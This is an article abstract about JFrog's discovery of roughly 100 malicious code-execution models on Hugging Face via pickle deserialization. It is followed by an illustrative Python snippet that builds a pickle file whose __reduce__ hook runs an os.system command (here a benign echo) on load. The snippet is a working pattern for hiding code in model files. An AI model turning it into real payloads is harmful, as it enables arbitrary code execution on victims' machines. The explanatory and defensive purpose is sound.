
Hugging Face AI Platform Riddled With 100 Malicious Code-Execution Models

Abstract:

JFrog Security Research scanned model files hosted on Hugging Face, a platform for open source machine learning models, and found roughly 100 malicious models. The vulnerability lies in how models are serialized: the file that initializes a model's functions and architecture can be altered to load pickle files, and pickle deserialization can execute arbitrary code. Because not all pickle code is malicious, Hugging Face only issues a warning when a user downloads a model containing pickle code; it does not scan for malicious intent. Hugging Face has had other security risks reported in the past, such as when researchers found insecure API access tokens for well-known open source commercial models, like Meta's Llama. These tokens allowed unfettered access to models and datasets, potentially enabling the theft of commercial secrets and the poisoning of training data. As the number of security risks grows, new tools are being developed to find and secure these vulnerabilities, such as Huntr, a bug-bounty program catered specifically to AI models.
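The pickle mechanism the abstract describes can be shown in a few lines. The sketch below is a minimal illustration, not code from the article or from JFrog's report: Python's pickle protocol lets a serialized object define a `__reduce__` hook that names a callable to be invoked the moment the file is deserialized, before any model code ever runs. The filename and the harmless `echo` payload here are hypothetical stand-ins for a real attack.

```python
import pickle


class MaliciousPayload:
    # pickle calls __reduce__ during serialization; whatever callable it
    # returns is invoked, with the given arguments, at *load* time.
    def __reduce__(self):
        import os
        # Benign stand-in for attacker code; a real payload could run
        # any shell command or Python on the victim's machine.
        return (os.system, ("echo 'arbitrary code ran during unpickling'",))


# Attacker serializes the object into a file disguised as model weights.
with open("model_weights.bin", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# Victim merely *loads* the file: the payload executes immediately,
# with no call to the model required.
with open("model_weights.bin", "rb") as f:
    pickle.load(f)
```

This is why a warning alone is weak protection: nothing distinguishes a malicious pickle from a benign one until it is loaded, at which point the code has already run.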

Author:
Elizabeth Montalbano
Year:
2024